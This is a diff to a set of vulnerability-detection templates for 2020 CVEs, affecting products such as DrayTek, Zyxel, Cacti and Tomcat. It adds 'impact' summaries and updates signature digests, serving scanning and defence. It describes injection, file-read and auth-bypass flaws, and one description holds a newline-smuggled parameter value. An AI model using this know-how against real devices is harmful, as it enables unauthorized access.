diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml
index f437324248..93352f1824 100644
--- a/http/cves/2020/CVE-2020-8497.yaml
+++ b/http/cves/2020/CVE-2020-8497.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
   remediation: |
     Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d7302d737968f4dac224d3524ea2ca8b7b37765bfc50fd3fa47feab2709b3140022100c05c7429743fc7d5b8dfc646deb1546f71f78cae1f76291c9381a2faf22696af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220370d8fd19a35d7de643c5a43895dec7b5c7a31478d37370e8f48b2e021a80e8802205aca93d02688d3e03667981071ae5a8d560e907cafda293ce7f44e8d1ecd991a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml
index 200372bdcc..26906cc1e2 100644
--- a/http/cves/2020/CVE-2020-8512.yaml
+++ b/http/cves/2020/CVE-2020-8512.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam,dwisiswant0
   severity: medium
   description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206716a13bd986a004ee71758df8a40d1016c501f20657c858c3c9550e47139071022100a6c9b36bb1c3d8681fefdf57e6665314964df3284b07f77be1b26917a3b9f27d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c35b1a279526c276b55578aff8e109b6a51ba5b77027e3e2bb9ef856a4e6623602203aedea2d40e1adcdd6dd79320315370194c2034f4ee9241c17d649cdd74bc351:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml
index 7e7e7da75e..af09213628 100644
--- a/http/cves/2020/CVE-2020-8515.yaml
+++ b/http/cves/2020/CVE-2020-8515.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network.
   remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.
   reference:
     - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a7fe4bd1ae61e836dc02769f8b3f3aea082747df037af14d38ca9b6f004b1b0d022100fa146d0067adf7a0a0b528509ff28322d4df0264ae779e5e60bd07ff34bf48c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205d49bd846897af9c1cc346444005995efcafefd3922e745bf01416305e2d53100221008b90bb94f55f741c1d8ba0d16329f4bc65667d2d91e9dc41f960f61a959041b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml
index 2077bec97d..d251799f41 100644
--- a/http/cves/2020/CVE-2020-8641.yaml
+++ b/http/cves/2020/CVE-2020-8641.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008c775b808f989d8a5d8f8c190811700a0d5e203f122ae8b361e7c583e53a5692022100df1cf476aedc62dc12db937b7cf3ca4e7ced1abef7869d325857c5ce84520c85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100afa03bb8985c16fd97965ce3e54f5b49f8d089db2049ae5d89fc14e8641edab8022100e1997e130adad79cb3cd3ef8eb151eb5209cfc5d0b93e8ef6fc9267cd861ed7f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml
index daca6da8f3..daf7bbee32 100644
--- a/http/cves/2020/CVE-2020-8644.yaml
+++ b/http/cves/2020/CVE-2020-8644.yaml
@@ -5,6 +5,8 @@ info:
   author: dbrwsky
   severity: critical
   description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
           - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
         attribute: value
         part: body
-# digest: 4b0a00483046022100b55f1cbbe8d92b4c560c674ea4497d53bad142b2aac412f9277b5685cbf8f0f3022100880d8ac2d1662e8247e094a9cc096b7619b823e9074a3af4cc242059e3c52047:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bb83710727ae77d3fad753377ffe9c90cc0f46b2c4ee8d502779ce549237b4cd022019b850d678480e785e8ddb4ed2d4fd4f25d4b4716528edef18c2b24828be1fb9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml
index 919e0237cb..e7534ab608 100644
--- a/http/cves/2020/CVE-2020-8654.yaml
+++ b/http/cves/2020/CVE-2020-8654.yaml
@@ -5,6 +5,8 @@ info:
   author: praetorian-thendrickson
   severity: high
   description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
+  impact: |
+    Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system.
   remediation: |
     Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities.
   reference:
@@ -54,4 +56,4 @@ http:
           - "# VERSION : ([0-9.]+)"
         internal: true
         part: body
-# digest: 4a0a00473045022031983db993ef949dd4f3864786727c7bea9ae36f7e6564980ed7968e430aabfc022100b9f0bd928344f7d14b86164212853dc2723dece40f8fbeb0569b102ae735fa49:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a021662b31cc33f892f87bcc6229d6eef5a145ffa05b7708edaf9c075e30249102202cf16b304c88ec8124d7b95cfb0c1212a02c4b59c5a4e37140fe777f02a6568a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml
index d6ba6eeae1..e41be0e922 100644
--- a/http/cves/2020/CVE-2020-8771.yaml
+++ b/http/cves/2020/CVE-2020-8771.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the WordPress Time Capsule plugin.
   remediation: |
     Update WordPress Time Capsule plugin to version 1.21.16 or later.
   reference:
@@ -65,4 +67,4 @@ http:
         regex:
           - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
         part: header
-# digest: 4a0a00473045022049a364b4ac1df18308b231ece53f4319a73f349ab2e4d50ab33549175432003e022100a2fc29f5d072fab0ed30aa95ffca6d24a65213260980d4de206bf16bd94d700d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ca58dd29a7eae8550daffe85b1026fb36e7debbeb7a42585c8f282e08d026db6022100bf4a1e9aad5e9a93855b4fb880644ad1caadd24ba330c34a29efb0003b5d4ad6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml
index 747b6d707d..b384044df5 100644
--- a/http/cves/2020/CVE-2020-8772.yaml
+++ b/http/cves/2020/CVE-2020-8772.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can gain unauthorized administrative access to the WordPress site.
   remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.
   reference:
     - https://wpscan.com/vulnerability/10011
@@ -77,4 +79,4 @@ http:
           - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
         internal: true
         part: header
-# digest: 4b0a00483046022100d5a9f22bb4a94b71aad8274235bcd7b4831a9a7de499cd0a71ba4ceb59c4d92a022100842acf5046e7bad7fa3153e21e52adf0a75ff7cedcbf24e0a5e1d70dbac7568d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220267e1c50d9f1429cfc4b47fe03fa70f9a7ef41ffabb098c9a7055073c39005b1022070edb1c1789c5366610800056d9d515dcff3c50f7367e69cd88db61261e76bae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml
index 27d3b2bacc..5f94ae8130 100644
--- a/http/cves/2020/CVE-2020-8813.yaml
+++ b/http/cves/2020/CVE-2020-8813.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4a0a0047304502207d97d30757678777d22d091dfca6036d3e6561ddbc592735872a6d3bb71c2a85022100df47ea7306e501afdf69959fb261ed018aca80c665bf95e1e16f88f298e876ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220359be84a610ee74cdb960f376e88ab266b16fb02bef522aa259e10163ecdef8d0220692ac6eb2447aadda231a7efb050dd028f22c8b0cc069cf95c767043204c1a45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml
index 23a7a83fda..13ca54d519 100644
--- a/http/cves/2020/CVE-2020-8982.yaml
+++ b/http/cves/2020/CVE-2020-8982.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
+  impact: |
+    An attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information.
   remediation: |
     Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022038530c6e9632f676e64fae5a7c2ae5fec28a5e750fb3500541105acf69ca1b0a022069136cdb505f9be326575cd27119b59cc8c4af5834648580d724b18d5e9f2be3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022008eba3b42d14b29e55f24bfb91b80a85deb884226d5bade0244ffc97b5e63336022100edf88420e3a292809e55c2a0c310e9a839e90aa207455df4b1f5c01ccc29fbeb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml
index 4ec72df625..466a85e140 100644
--- a/http/cves/2020/CVE-2020-9036.yaml
+++ b/http/cves/2020/CVE-2020-9036.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204cc96f139bbb6bf3b257fbd8015e102f61f3ea99a1da15c6fe035915335496750220650b4925edfb7c4d16b744ab3eec46d3b26afe85708621f8d2acf88f5ac85d0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fe5f3e886f9e8b4b19a4659b35c768b8b12169222b6d7ad969e285c96b3014d8022071bab64309355a0f9ae2592adb9171be417856e9310dbcf34bbfd44c8457f93d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml
index 6d3572b322..eb22c3f057 100644
--- a/http/cves/2020/CVE-2020-9043.yaml
+++ b/http/cves/2020/CVE-2020-9043.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the  connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin.
   remediation: |
     Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability.
   reference:
@@ -75,4 +77,4 @@ http:
           - '_wpnonce=([0-9a-z]+)'
         internal: true
         part: body
-# digest: 490a00463044022076fffb7414b675cded1bc53334d5d6fe3e716ba425d0375b7d696f80038b3aa30220312ffe3c99ce4f35d68682be6d22321fec51f2397148639161474b4577462ff8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022078da7c457e525c82c1b289c8595b103fcd4966dab1c9bfa6e7e8e2a7d12e5a0802203332f23d0e28855a3b2070af655094b75b495a4a6e071115392f3ae2e0093dfd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml
index 922ac2c930..dae0407eac 100644
--- a/http/cves/2020/CVE-2020-9047.yaml
+++ b/http/cves/2020/CVE-2020-9047.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or update provided by the vendor to fix the vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100926c406107c1cf95d31e750fe748b70684eed4817717ac07597901b7506855bc02202cb7e7c1601c009ff9a3e49608d298efb406b8a7deec7881fe3cc32575823b81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201bf20ac38aeb7095d31ff2be6e4ab4b81ecfb1cbad82be04997a278d97ff3a18022003be605016cec1f3f0f9186f1ebd0427b6dc46ee4e7317220ed2652f1a87e2b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml
index 276ba96138..afebfb101a 100644
--- a/http/cves/2020/CVE-2020-9054.yaml
+++ b/http/cves/2020/CVE-2020-9054.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: critical
   description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker.   However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.'
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware update provided by Zyxel to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ed6299e13cce48f7b4f8e9e0d8b659a5ec2ecad09a0eedcdd95000b30a9d1f3402207a54e3a2d52c341f09b799e09564776b41fc88f0a97b65d96fa885ba8d7178ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205a179516a1406209e5ac4bcb6b80c5389c7ffc9a3316c7a8dcf2ca91fd64e45302202491fd14dadafcfef6d938bed67087e1bf3a325d4ab6e07e076497e45bbc59f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml
index 7050cb27b6..c6d803b6c1 100644
--- a/http/cves/2020/CVE-2020-9315.yaml
+++ b/http/cves/2020/CVE-2020-9315.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c4d92eba6b1c63bfda318176f7e57ad1b6d15409cfb3651a48a2536c2b7ce22002203c50f72898c7294b19d6aeed71d124d8a184fdc6be87ac7171ced529c040122a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203ac37b6ceb5e5f7a5970c39eb48a5430b6e9a22157641a8178351a2f60d79b83022009a5ba8866dc18b6bc15bfdd25da52b5e39cbfd0fcacf6c22f6250051e6845ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml
index f8d32cf077..1e4c06bf76 100644
--- a/http/cves/2020/CVE-2020-9344.yaml
+++ b/http/cves/2020/CVE-2020-9344.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022031b89dde2e055e6a55fda3dd6ff7ff7a882965204502746ab1d86cabc0b32e62022100acfe22b8457a02caebe820aa6565e151e585e0949e2e97cda886d3cab4379b05:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ed8b99780a0629265ef29a6d1d36d7f213f7814bd6144e1037a28e327dfef25e022100dc2e242e565e24e655c22629be6c9ff893955a3ff0cbbde87a5494d1c8a30a15:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml
index 4ab57e5dc2..69ef5249e3 100644
--- a/http/cves/2020/CVE-2020-9376.yaml
+++ b/http/cves/2020/CVE-2020-9376.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
     NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+  impact: |
+    An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks.
   remediation: |
     Apply the latest firmware update provided by D-Link to fix the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022033e7ba82c891fdc0638a960d33f0146201b5463e327f2397ff90f52cf4d2337f0221008f8e72617936ef8a83dfeff04034165a351a99a2d16ff630b3f3b4d1633b7f16:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d6ddff42ef4569eaaa6623e2c78451ff561bb0089da7d6d88553d03653ff83680221008566746b5529ac9ef917066d791c51acf434d4940b0e1d7ca0a52e2f260c34cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml
index cdb596d70d..11e55d17e7 100644
--- a/http/cves/2020/CVE-2020-9402.yaml
+++ b/http/cves/2020/CVE-2020-9402.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Upgrade to the latest version.
   reference:
     - https://www.debian.org/security/2020/dsa-4705
@@ -39,4 +41,4 @@ http:
           - "ORA-06512:"
           - "Request Method:"
         condition: and
-# digest: 490a00463044022033130537716b86490813d40362368b2e9846762a985e43cb82b8e3c212d76b9202200e474f9edf6dabf4f3b935087333f35994a6083eb319b9335c56507972341fd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203ab8b410136d9462ddc4b2681daf2b791c543ab952724cdae47e4129a4fd561302210095a55834d3cf34c7b9bcfe5f227c58ff18ad57fda46ed62d01b3ee2965fc4a99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml
index 89d726a45f..21fa4b803f 100644
--- a/http/cves/2020/CVE-2020-9425.yaml
+++ b/http/cves/2020/CVE-2020-9425.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: high
   description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords.
   remediation: |
     Upgrade rConfig to version 3.9.4 or later to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220651dbf649cde495d093ca5d8767f1bebd59230b55d41bc3d3fe18de6e5f353c30221008bb1a4374e78aed253007962231d9ed575bb7b248c7e4dc63af175ac27f3f3f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201cf9db6593fb8aeb0176b124defe0408beb52f0b45295390aa3e824710b7e3b3022100a65526385a422c553a3640ea25da2bb45fdc66337291d6db70da929b17448df2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml
index ae7cca18dd..e844b18aaa 100644
--- a/http/cves/2020/CVE-2020-9483.yaml
+++ b/http/cves/2020/CVE-2020-9483.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022008c5d455c0241e32577ae8a98eb99684c91daaa63c3c1101ac24a412ab993e5e02204555d7b6807dd3ec6119563708791a134383d60035891e9112ebb5328a53ee0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207839ba17fb9ecc32cdf806304a1410718647d941e235d11f4d08c294594ca5cc02205438557a449b50f951819e1472354798b9cd00bcbcece979252b3857083484d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml
index 2404532a10..d8442b2745 100644
--- a/http/cves/2020/CVE-2020-9484.yaml
+++ b/http/cves/2020/CVE-2020-9484.yaml
@@ -11,6 +11,8 @@ info:
     c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
     d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
     Note that all of conditions a) to d) must be true for the attack to succeed.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary commands on the affected system.
   remediation: |
     Apply the latest security patches provided by Apache to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022059fa111e4366374ccb1947ab8a3d4b50b49cdefcd3854ff26109844040da5cd6022100f360de2602e428c6cb764d3525691e256e2fc974cae3a0d60cf858b33767a6ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100be266720f1c031d4a76ac5b42a136333a82a907feddb6c270692f2a9b46b7b45022029dd567b1a0aa612adbbf18c335f23ff9e5dc8cf4ed9c7a54fa88da1c07a41fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml
index 638fa23950..1fa96f5e85 100644
--- a/http/cves/2020/CVE-2020-9496.yaml
+++ b/http/cves/2020/CVE-2020-9496.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache OFBiz.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f83878386de634cdd95aa367eba06e5985239dcc4ee1159d770b52209c7abf1c02201941357bcb476c36793f374297cf2343362324c6f4f25e5ab2d70436d0b56398:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
